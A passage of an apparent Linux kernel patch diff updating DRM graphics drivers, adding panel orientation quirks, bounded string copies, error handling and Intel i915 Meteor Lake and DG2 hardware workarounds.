++EXPORT_SYMBOL(mipi_dsi_dcs_get_display_brightness_large);
++
+ static int mipi_dsi_drv_probe(struct device *dev)
+ {
+ 	struct mipi_dsi_driver *drv = to_mipi_dsi_driver(dev->driver);
+diff --git a/drivers/gpu/drm/drm_mode_config.c b/drivers/gpu/drm/drm_mode_config.c
+index 688c8afe0bf17..8525ef8515406 100644
+--- a/drivers/gpu/drm/drm_mode_config.c
++++ b/drivers/gpu/drm/drm_mode_config.c
+@@ -399,6 +399,8 @@ static void drm_mode_config_init_release(struct drm_device *dev, void *ptr)
+  */
+ int drmm_mode_config_init(struct drm_device *dev)
+ {
++	int ret;
++
+ 	mutex_init(&dev->mode_config.mutex);
+ 	drm_modeset_lock_init(&dev->mode_config.connection_mutex);
+ 	mutex_init(&dev->mode_config.idr_mutex);
+@@ -420,7 +422,11 @@ int drmm_mode_config_init(struct drm_device *dev)
+ 	init_llist_head(&dev->mode_config.connector_free_list);
+ 	INIT_WORK(&dev->mode_config.connector_free_work, drm_connector_free_work_fn);
+ 
+-	drm_mode_create_standard_properties(dev);
++	ret = drm_mode_create_standard_properties(dev);
++	if (ret) {
++		drm_mode_config_cleanup(dev);
++		return ret;
++	}
+ 
+ 	/* Just to be sure */
+ 	dev->mode_config.num_fb = 0;
+diff --git a/drivers/gpu/drm/drm_modes.c b/drivers/gpu/drm/drm_modes.c
+index 3c8034a8c27bd..951afe8279da8 100644
+--- a/drivers/gpu/drm/drm_modes.c
++++ b/drivers/gpu/drm/drm_modes.c
+@@ -1809,7 +1809,7 @@ static int drm_mode_parse_cmdline_named_mode(const char *name,
+ 		if (ret != name_end)
+ 			continue;
+ 
+-		strcpy(cmdline_mode->name, mode->name);
++		strscpy(cmdline_mode->name, mode->name, sizeof(cmdline_mode->name));
+ 		cmdline_mode->pixel_clock = mode->pixel_clock_khz;
+ 		cmdline_mode->xres = mode->xres;
+ 		cmdline_mode->yres = mode->yres;
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 3659f0465a724..5522d610c5cfd 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -30,12 +30,6 @@ struct drm_dmi_panel_orientation_data {
+ 	int orientation;
+ };
+ 
+-static const struct drm_dmi_panel_orientation_data asus_t100ha = {
+-	.width = 800,
+-	.height = 1280,
+-	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
+-};
+-
+ static const struct drm_dmi_panel_orientation_data gpd_micropc = {
+ 	.width = 720,
+ 	.height = 1280,
+@@ -97,6 +91,12 @@ static const struct drm_dmi_panel_orientation_data lcd720x1280_rightside_up = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data lcd800x1280_leftside_up = {
++	.width = 800,
++	.height = 1280,
++	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
++};
++
+ static const struct drm_dmi_panel_orientation_data lcd800x1280_rightside_up = {
+ 	.width = 800,
+ 	.height = 1280,
+@@ -127,6 +127,12 @@ static const struct drm_dmi_panel_orientation_data lcd1600x2560_leftside_up = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data lcd1600x2560_rightside_up = {
++	.width = 1600,
++	.height = 2560,
++	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
++};
++
+ static const struct dmi_system_id orientation_data[] = {
+ 	{	/* Acer One 10 (S1003) */
+ 		.matches = {
+@@ -151,7 +157,7 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "T100HAN"),
+ 		},
+-		.driver_data = (void *)&asus_t100ha,
++		.driver_data = (void *)&lcd800x1280_leftside_up,
+ 	}, {	/* Asus T101HA */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+@@ -196,6 +202,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Hi10 pro tablet"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Dynabook K50 */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Dynabook Inc."),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "dynabook K50/FR"),
++		},
++		.driver_data = (void *)&lcd800x1280_leftside_up,
+ 	}, {	/* GPD MicroPC (generic strings, also match on bios date) */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Default string"),
+@@ -310,6 +322,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "Lenovo ideapad D330-10IGL"),
+ 		},
+ 		.driver_data = (void *)&lcd800x1280_rightside_up,
++	}, {	/* Lenovo IdeaPad Duet 3 10IGL5 */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Duet 3 10IGL5"),
++		},
++		.driver_data = (void *)&lcd1200x1920_rightside_up,
+ 	}, {	/* Lenovo Yoga Book X90F / X91F / X91L */
+ 		.matches = {
+ 		  /* Non exact match to match all versions */
+@@ -331,6 +349,13 @@ static const struct dmi_system_id orientation_data[] = {
+ 		 DMI_MATCH(DMI_BIOS_VERSION, "BLADE_21"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Yoga Tab 3 X90F */
++		.matches = {
++		 DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++		 DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++		 DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
++		},
++		.driver_data = (void *)&lcd1600x2560_rightside_up,
+ 	}, {	/* Nanote UMPC-01 */
+ 		.matches = {
+ 		 DMI_MATCH(DMI_SYS_VENDOR, "RWC CO.,LTD"),
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_dsi.c b/drivers/gpu/drm/exynos/exynos_drm_dsi.c
+index ec673223d6b7a..b5305b145ddbd 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_dsi.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_dsi.c
+@@ -805,15 +805,15 @@ static int exynos_dsi_init_link(struct exynos_dsi *dsi)
+ 			reg |= DSIM_AUTO_MODE;
+ 		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_HSE)
+ 			reg |= DSIM_HSE_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HFP))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HFP)
+ 			reg |= DSIM_HFP_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HBP))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HBP)
+ 			reg |= DSIM_HBP_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HSA))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HSA)
+ 			reg |= DSIM_HSA_MODE;
+ 	}
+ 
+-	if (!(dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET))
++	if (dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET)
+ 		reg |= DSIM_EOT_DISABLE;
+ 
+ 	switch (dsi->format) {
+diff --git a/drivers/gpu/drm/gud/gud_pipe.c b/drivers/gpu/drm/gud/gud_pipe.c
+index 7c6dc2bcd14a6..61f4abaf1811f 100644
+--- a/drivers/gpu/drm/gud/gud_pipe.c
++++ b/drivers/gpu/drm/gud/gud_pipe.c
+@@ -157,8 +157,8 @@ static int gud_prep_flush(struct gud_device *gdrm, struct drm_framebuffer *fb,
+ {
+ 	struct dma_buf_attachment *import_attach = fb->obj[0]->import_attach;
+ 	u8 compression = gdrm->compression;
+-	struct iosys_map map[DRM_FORMAT_MAX_PLANES];
+-	struct iosys_map map_data[DRM_FORMAT_MAX_PLANES];
++	struct iosys_map map[DRM_FORMAT_MAX_PLANES] = { };
++	struct iosys_map map_data[DRM_FORMAT_MAX_PLANES] = { };
+ 	struct iosys_map dst;
+ 	void *vaddr, *buf;
+ 	size_t pitch, len;
+diff --git a/drivers/gpu/drm/i915/display/intel_quirks.c b/drivers/gpu/drm/i915/display/intel_quirks.c
+index 6e48d3bcdfec5..a280448df771a 100644
+--- a/drivers/gpu/drm/i915/display/intel_quirks.c
++++ b/drivers/gpu/drm/i915/display/intel_quirks.c
+@@ -199,6 +199,8 @@ static struct intel_quirk intel_quirks[] = {
+ 	/* ECS Liva Q2 */
+ 	{ 0x3185, 0x1019, 0xa94d, quirk_increase_ddi_disabled_time },
+ 	{ 0x3184, 0x1019, 0xa94d, quirk_increase_ddi_disabled_time },
++	/* HP Notebook - 14-r206nv */
++	{ 0x0f31, 0x103c, 0x220f, quirk_invert_brightness },
+ };
+ 
+ void intel_init_quirks(struct drm_i915_private *i915)
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_cs.c b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+index d37931e16fd9b..34b0a9dadce4f 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+@@ -1476,10 +1476,12 @@ static int __intel_engine_stop_cs(struct intel_engine_cs *engine,
+ 	intel_uncore_write_fw(uncore, mode, _MASKED_BIT_ENABLE(STOP_RING));
+ 
+ 	/*
+-	 * Wa_22011802037 : gen11, gen12, Prior to doing a reset, ensure CS is
++	 * Wa_22011802037: Prior to doing a reset, ensure CS is
+ 	 * stopped, set ring stop bit and prefetch disable bit to halt CS
+ 	 */
+-	if (IS_GRAPHICS_VER(engine->i915, 11, 12))
++	if (IS_MTL_GRAPHICS_STEP(engine->i915, M, STEP_A0, STEP_B0) ||
++	    (GRAPHICS_VER(engine->i915) >= 11 &&
++	    GRAPHICS_VER_FULL(engine->i915) < IP_VER(12, 70)))
+ 		intel_uncore_write_fw(uncore, RING_MODE_GEN7(engine->mmio_base),
+ 				      _MASKED_BIT_ENABLE(GEN12_GFX_PREFETCH_DISABLE));
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index 21cb5b69d82eb..3c573d41d4046 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -2989,10 +2989,12 @@ static void execlists_reset_prepare(struct intel_engine_cs *engine)
+ 	intel_engine_stop_cs(engine);
+ 
+ 	/*
+-	 * Wa_22011802037:gen11/gen12: In addition to stopping the cs, we need
++	 * Wa_22011802037: In addition to stopping the cs, we need
+ 	 * to wait for any pending mi force wakeups
+ 	 */
+-	if (IS_GRAPHICS_VER(engine->i915, 11, 12))
++	if (IS_MTL_GRAPHICS_STEP(engine->i915, M, STEP_A0, STEP_B0) ||
++	    (GRAPHICS_VER(engine->i915) >= 11 &&
++	    GRAPHICS_VER_FULL(engine->i915) < IP_VER(12, 70)))
+ 		intel_engine_wait_for_pending_mi_fw(engine);
+ 
+ 	engine->execlists.reset_ccid = active_ccid(engine);
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_mcr.c b/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
+index ea86c1ab5dc56..58ea3325bbdaa 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
+@@ -162,8 +162,15 @@ void intel_gt_mcr_init(struct intel_gt *gt)
+ 	if (MEDIA_VER(i915) >= 13 && gt->type == GT_MEDIA) {
+ 		gt->steering_table[OADDRM] = xelpmp_oaddrm_steering_table;
+ 	} else if (GRAPHICS_VER_FULL(i915) >= IP_VER(12, 70)) {
+-		fuse = REG_FIELD_GET(GT_L3_EXC_MASK,
+-				     intel_uncore_read(gt->uncore, XEHP_FUSE4));
++		/* Wa_14016747170 */
++		if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++		    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0))
++			fuse = REG_FIELD_GET(MTL_GT_L3_EXC_MASK,
++					     intel_uncore_read(gt->uncore,
++							       MTL_GT_ACTIVITY_FACTOR));
++		else
++			fuse = REG_FIELD_GET(GT_L3_EXC_MASK,
++					     intel_uncore_read(gt->uncore, XEHP_FUSE4));
+ 
+ 		/*
+ 		 * Despite the register field being named "exclude mask" the
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_regs.h b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+index a5454af2a9cfd..9758b0b635601 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_regs.h
++++ b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+@@ -413,6 +413,7 @@
+ #define   TBIMR_FAST_CLIP			REG_BIT(5)
+ 
+ #define VFLSKPD					MCR_REG(0x62a8)
++#define   VF_PREFETCH_TLB_DIS			REG_BIT(5)
+ #define   DIS_OVER_FETCH_CACHE			REG_BIT(1)
+ #define   DIS_MULT_MISS_RD_SQUASH		REG_BIT(0)
+ 
+@@ -680,10 +681,7 @@
+ #define GEN6_RSTCTL				_MMIO(0x9420)
+ 
+ #define GEN7_MISCCPCTL				_MMIO(0x9424)
+-#define   GEN7_DOP_CLOCK_GATE_ENABLE		(1 << 0)
+-
+-#define GEN8_MISCCPCTL				MCR_REG(0x9424)
+-#define   GEN8_DOP_CLOCK_GATE_ENABLE		REG_BIT(0)
++#define   GEN7_DOP_CLOCK_GATE_ENABLE		REG_BIT(0)
+ #define   GEN12_DOP_CLOCK_GATE_RENDER_ENABLE	REG_BIT(1)
+ #define   GEN8_DOP_CLOCK_GATE_CFCLK_ENABLE	(1 << 2)
+ #define   GEN8_DOP_CLOCK_GATE_GUC_ENABLE	(1 << 4)
+@@ -968,7 +966,8 @@
+ #define   GEN7_WA_FOR_GEN7_L3_CONTROL		0x3C47FF8C
+ #define   GEN7_L3AGDIS				(1 << 19)
+ 
+-#define XEHPC_LNCFMISCCFGREG0			_MMIO(0xb01c)
++#define XEHPC_LNCFMISCCFGREG0			MCR_REG(0xb01c)
++#define   XEHPC_HOSTCACHEEN			REG_BIT(1)
+ #define   XEHPC_OVRLSCCC			REG_BIT(0)
+ 
+ #define GEN7_L3CNTLREG2				_MMIO(0xb020)
+@@ -1030,7 +1029,7 @@
+ #define XEHP_L3SCQREG7				MCR_REG(0xb188)
+ #define   BLEND_FILL_CACHING_OPT_DIS		REG_BIT(3)
+ 
+-#define XEHPC_L3SCRUB				_MMIO(0xb18c)
++#define XEHPC_L3SCRUB				MCR_REG(0xb18c)
+ #define   SCRUB_CL_DWNGRADE_SHARED		REG_BIT(12)
+ #define   SCRUB_RATE_PER_BANK_MASK		REG_GENMASK(2, 0)
+ #define   SCRUB_RATE_4B_PER_CLK			REG_FIELD_PREP(SCRUB_RATE_PER_BANK_MASK, 0x6)
+@@ -1088,16 +1087,19 @@
+ #define XEHP_MERT_MOD_CTRL			MCR_REG(0xcf28)
+ #define RENDER_MOD_CTRL				MCR_REG(0xcf2c)
+ #define COMP_MOD_CTRL				MCR_REG(0xcf30)
+-#define VDBX_MOD_CTRL				MCR_REG(0xcf34)
+-#define VEBX_MOD_CTRL				MCR_REG(0xcf38)
++#define XELPMP_GSC_MOD_CTRL			_MMIO(0xcf30)	/* media GT only */
++#define XEHP_VDBX_MOD_CTRL			MCR_REG(0xcf34)
++#define XELPMP_VDBX_MOD_CTRL			_MMIO(0xcf34)
++#define XEHP_VEBX_MOD_CTRL			MCR_REG(0xcf38)
++#define XELPMP_VEBX_MOD_CTRL			_MMIO(0xcf38)
+ #define   FORCE_MISS_FTLB			REG_BIT(3)
+ 
+-#define GEN12_GAMSTLB_CTRL			_MMIO(0xcf4c)
++#define XEHP_GAMSTLB_CTRL			MCR_REG(0xcf4c)
+ #define   CONTROL_BLOCK_CLKGATE_DIS		REG_BIT(12)
+ #define   EGRESS_BLOCK_CLKGATE_DIS		REG_BIT(11)
+ #define   TAG_BLOCK_CLKGATE_DIS			REG_BIT(7)
+ 
+-#define GEN12_GAMCNTRL_CTRL			_MMIO(0xcf54)
++#define XEHP_GAMCNTRL_CTRL			MCR_REG(0xcf54)
+ #define   INVALIDATION_BROADCAST_MODE_DIS	REG_BIT(12)
+ #define   GLOBAL_INVALIDATION_MODE		REG_BIT(2)
+ 
+@@ -1528,6 +1530,9 @@
+ 
+ #define MTL_MEDIA_MC6				_MMIO(0x138048)
+ 
++#define MTL_GT_ACTIVITY_FACTOR			_MMIO(0x138010)
++#define   MTL_GT_L3_EXC_MASK			REG_GENMASK(5, 3)
++
+ #define GEN6_GT_THREAD_STATUS_REG		_MMIO(0x13805c)
+ #define   GEN6_GT_THREAD_STATUS_CORE_MASK	0x7
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_ring.c b/drivers/gpu/drm/i915/gt/intel_ring.c
+index 15ec64d881c44..fb99143be98e7 100644
+--- a/drivers/gpu/drm/i915/gt/intel_ring.c
++++ b/drivers/gpu/drm/i915/gt/intel_ring.c
+@@ -53,7 +53,7 @@ int intel_ring_pin(struct intel_ring *ring, struct i915_gem_ww_ctx *ww)
+ 	if (unlikely(ret))
+ 		goto err_unpin;
+ 
+-	if (i915_vma_is_map_and_fenceable(vma)) {
++	if (i915_vma_is_map_and_fenceable(vma) && !HAS_LLC(vma->vm->i915)) {
+ 		addr = (void __force *)i915_vma_pin_iomap(vma);
+ 	} else {
+ 		int type = i915_coherent_map_type(vma->vm->i915, vma->obj, false);
+@@ -98,7 +98,7 @@ void intel_ring_unpin(struct intel_ring *ring)
+ 		return;
+ 
+ 	i915_vma_unset_ggtt_write(vma);
+-	if (i915_vma_is_map_and_fenceable(vma))
++	if (i915_vma_is_map_and_fenceable(vma) && !HAS_LLC(vma->vm->i915))
+ 		i915_vma_unpin_iomap(vma);
+ 	else
+ 		i915_gem_object_unpin_map(vma->obj);
+@@ -116,7 +116,7 @@ static struct i915_vma *create_ring_vma(struct i915_ggtt *ggtt, int size)
+ 
+ 	obj = i915_gem_object_create_lmem(i915, size, I915_BO_ALLOC_VOLATILE |
+ 					  I915_BO_ALLOC_PM_VOLATILE);
+-	if (IS_ERR(obj) && i915_ggtt_has_aperture(ggtt))
++	if (IS_ERR(obj) && i915_ggtt_has_aperture(ggtt) && !HAS_LLC(i915))
+ 		obj = i915_gem_object_create_stolen(i915, size);
+ 	if (IS_ERR(obj))
+ 		obj = i915_gem_object_create_internal(i915, size);
+diff --git a/drivers/gpu/drm/i915/gt/intel_workarounds.c b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+index a0740308555d8..e13052c5dae19 100644
+--- a/drivers/gpu/drm/i915/gt/intel_workarounds.c
++++ b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+@@ -224,6 +224,12 @@ wa_write(struct i915_wa_list *wal, i915_reg_t reg, u32 set)
+ 	wa_write_clr_set(wal, reg, ~0, set);
+ }
+ 
++static void
++wa_mcr_write(struct i915_wa_list *wal, i915_mcr_reg_t reg, u32 set)
++{
++	wa_mcr_write_clr_set(wal, reg, ~0, set);
++}
++
+ static void
+ wa_write_or(struct i915_wa_list *wal, i915_reg_t reg, u32 set)
+ {
+@@ -786,6 +792,32 @@ static void dg2_ctx_workarounds_init(struct intel_engine_cs *engine,
+ 	wa_masked_en(wal, CACHE_MODE_1, MSAA_OPTIMIZATION_REDUC_DISABLE);
+ }
+ 
++static void mtl_ctx_workarounds_init(struct intel_engine_cs *engine,
++				     struct i915_wa_list *wal)
++{
++	struct drm_i915_private *i915 = engine->i915;
++
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0)) {
++		/* Wa_14014947963 */
++		wa_masked_field_set(wal, VF_PREEMPTION,
++				    PREEMPTION_VERTEX_COUNT, 0x4000);
++
++		/* Wa_16013271637 */
++		wa_mcr_masked_en(wal, XEHP_SLICE_COMMON_ECO_CHICKEN1,
++				 MSC_MSAA_REODER_BUF_BYPASS_DISABLE);
++
++		/* Wa_18019627453 */
++		wa_mcr_masked_en(wal, VFLSKPD, VF_PREFETCH_TLB_DIS);
++
++		/* Wa_18018764978 */
++		wa_masked_en(wal, PSS_MODE2, SCOREBOARD_STALL_FLUSH_CONTROL);
++	}
++
++	/* Wa_18019271663 */
++	wa_masked_en(wal, CACHE_MODE_1, MSAA_OPTIMIZATION_REDUC_DISABLE);
++}
++
+ static void fakewa_disable_nestedbb_mode(struct intel_engine_cs *engine,
+ 					 struct i915_wa_list *wal)
+ {
+@@ -872,7 +904,9 @@ __intel_engine_init_ctx_wa(struct intel_engine_cs *engine,
+ 	if (engine->class != RENDER_CLASS)
+ 		goto done;
+ 
+-	if (IS_PONTEVECCHIO(i915))
++	if (IS_METEORLAKE(i915))
++		mtl_ctx_workarounds_init(engine, wal);
++	else if (IS_PONTEVECCHIO(i915))
+ 		; /* noop; none at this time */
+ 	else if (IS_DG2(i915))
+ 		dg2_ctx_workarounds_init(engine, wal);
+@@ -1522,6 +1556,13 @@ xehpsdv_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 
+ 	/* Wa_14011060649:xehpsdv */
+ 	wa_14011060649(gt, wal);
++
++	/* Wa_14012362059:xehpsdv */
++	wa_mcr_write_or(wal, XEHP_MERT_MOD_CTRL, FORCE_MISS_FTLB);
++
++	/* Wa_14014368820:xehpsdv */
++	wa_mcr_write_or(wal, XEHP_GAMCNTRL_CTRL,
++			INVALIDATION_BROADCAST_MODE_DIS | GLOBAL_INVALIDATION_MODE);
+ }
+ 
+ static void
+@@ -1562,6 +1603,12 @@ dg2_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 				DSS_ROUTER_CLKGATE_DIS);
+ 	}
+ 
++	if (IS_DG2_GRAPHICS_STEP(gt->i915, G10, STEP_A0, STEP_B0) ||
++	    IS_DG2_GRAPHICS_STEP(gt->i915, G11, STEP_A0, STEP_B0)) {
++		/* Wa_14012362059:dg2 */
++		wa_mcr_write_or(wal, XEHP_MERT_MOD_CTRL, FORCE_MISS_FTLB);
++	}
++
+ 	if (IS_DG2_GRAPHICS_STEP(gt->i915, G10, STEP_A0, STEP_B0)) {
+ 		/* Wa_14010948348:dg2_g10 */
+ 		wa_write_or(wal, UNSLCGCTL9430, MSQDUNIT_CLKGATE_DIS);
+@@ -1607,6 +1654,12 @@ dg2_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 
+ 		/* Wa_14011028019:dg2_g10 */
+ 		wa_mcr_write_or(wal, SSMCGCTL9530, RTFUNIT_CLKGATE_DIS);
++
++		/* Wa_14010680813:dg2_g10 */
++		wa_mcr_write_or(wal, XEHP_GAMSTLB_CTRL,
++				CONTROL_BLOCK_CLKGATE_DIS |
++				EGRESS_BLOCK_CLKGATE_DIS |
++				TAG_BLOCK_CLKGATE_DIS);
+ 	}
+ 
+ 	/* Wa_14014830051:dg2 */
+@@ -1620,7 +1673,17 @@ dg2_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 	wa_mcr_write_or(wal, XEHP_SQCM, EN_32B_ACCESS);
+ 
+ 	/* Wa_14015795083 */
+-	wa_mcr_write_clr(wal, GEN8_MISCCPCTL, GEN12_DOP_CLOCK_GATE_RENDER_ENABLE);
++	wa_write_clr(wal, GEN7_MISCCPCTL, GEN12_DOP_CLOCK_GATE_RENDER_ENABLE);
++
++	/* Wa_18018781329 */
++	wa_mcr_write_or(wal, RENDER_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, COMP_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, XEHP_VDBX_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, XEHP_VEBX_MOD_CTRL, FORCE_MISS_FTLB);
++
++	/* Wa_1509235366:dg2 */
++	wa_mcr_write_or(wal, XEHP_GAMCNTRL_CTRL,
++			INVALIDATION_BROADCAST_MODE_DIS | GLOBAL_INVALIDATION_MODE);
+ }
+ 
+ static void
+@@ -1629,13 +1692,27 @@ pvc_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 	pvc_init_mcr(gt, wal);
+ 
+ 	/* Wa_14015795083 */
+-	wa_mcr_write_clr(wal, GEN8_MISCCPCTL, GEN12_DOP_CLOCK_GATE_RENDER_ENABLE);
++	wa_write_clr(wal, GEN7_MISCCPCTL, GEN12_DOP_CLOCK_GATE_RENDER_ENABLE);
++
++	/* Wa_18018781329 */
++	wa_mcr_write_or(wal, RENDER_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, COMP_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, XEHP_VDBX_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, XEHP_VEBX_MOD_CTRL, FORCE_MISS_FTLB);
+ }
+ 
+ static void
+ xelpg_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ {
+-	/* FIXME: Actual workarounds will be added in future patch(es) */
++	if (IS_MTL_GRAPHICS_STEP(gt->i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(gt->i915, P, STEP_A0, STEP_B0)) {
++		/* Wa_14014830051 */
++		wa_mcr_write_clr(wal, SARB_CHICKEN1, COMP_CKN_IN);
++
++		/* Wa_18018781329 */
++		wa_mcr_write_or(wal, RENDER_MOD_CTRL, FORCE_MISS_FTLB);
++		wa_mcr_write_or(wal, COMP_MOD_CTRL, FORCE_MISS_FTLB);
++	}
+ 
+ 	/*
+ 	 * Unlike older platforms, we no longer setup implicit steering here;
+@@ -1647,7 +1724,17 @@ xelpg_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ static void
+ xelpmp_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ {
+-	/* FIXME: Actual workarounds will be added in future patch(es) */
++	if (IS_MTL_MEDIA_STEP(gt->i915, STEP_A0, STEP_B0)) {
++		/*
++		 * Wa_18018781329
++		 *
++		 * Note that although these registers are MCR on the primary
++		 * GT, the media GT's versions are regular singleton registers.
++		 */
++		wa_write_or(wal, XELPMP_GSC_MOD_CTRL, FORCE_MISS_FTLB);
++		wa_write_or(wal, XELPMP_VDBX_MOD_CTRL, FORCE_MISS_FTLB);
++		wa_write_or(wal, XELPMP_VEBX_MOD_CTRL, FORCE_MISS_FTLB);
++	}
+ 
+ 	debug_dump_steering(gt);
+ }
+@@ -2171,7 +2258,9 @@ void intel_engine_init_whitelist(struct intel_engine_cs *engine)
+ 
+ 	wa_init_start(w, engine->gt, "whitelist", engine->name);
+ 
+-	if (IS_PONTEVECCHIO(i915))
++	if (IS_METEORLAKE(i915))
++		; /* noop; none at this time */
++	else if (IS_PONTEVECCHIO(i915))
+ 		pvc_whitelist_build(engine);
+ 	else if (IS_DG2(i915))
+ 		dg2_whitelist_build(engine);
+@@ -2281,22 +2370,37 @@ rcs_engine_wa_init(struct intel_engine_cs *engine, struct i915_wa_list *wal)
+ {
+ 	struct drm_i915_private *i915 = engine->i915;
+ 
+-	if (IS_DG2(i915)) {
+-		/* Wa_1509235366:dg2 */
+-		wa_write_or(wal, GEN12_GAMCNTRL_CTRL, INVALIDATION_BROADCAST_MODE_DIS |
+-			    GLOBAL_INVALIDATION_MODE);
+-	}
+-
+-	if (IS_DG2_GRAPHICS_STEP(i915, G11, STEP_A0, STEP_B0)) {
+-		/* Wa_14013392000:dg2_g11 */
+-		wa_mcr_masked_en(wal, GEN8_ROW_CHICKEN2, GEN12_ENABLE_LARGE_GRF_MODE);
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0)) {
++		/* Wa_22014600077 */
++		wa_mcr_masked_en(wal, GEN10_CACHE_MODE_SS,
++				 ENABLE_EU_COUNT_FOR_TDL_FLUSH);
+ 	}
+ 
+-	if (IS_DG2_GRAPHICS_STEP(i915, G10, STEP_B0, STEP_FOREVER) ||
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0) ||
++	    IS_DG2_GRAPHICS_STEP(i915, G10, STEP_B0, STEP_FOREVER) ||
+ 	    IS_DG2_G11(i915) || IS_DG2_G12(i915)) {
+-		/* Wa_1509727124:dg2 */
++		/* Wa_1509727124 */
+ 		wa_mcr_masked_en(wal, GEN10_SAMPLER_MODE,
+ 				 SC_DISABLE_POWER_OPTIMIZATION_EBB);
++
++		/* Wa_22013037850 */
++		wa_mcr_write_or(wal, LSC_CHICKEN_BIT_0_UDW,
++				DISABLE_128B_EVICTION_COMMAND_UDW);
++	}
++
++	if (IS_DG2_GRAPHICS_STEP(i915, G10, STEP_B0, STEP_FOREVER) ||
++	    IS_DG2_G11(i915) || IS_DG2_G12(i915) ||
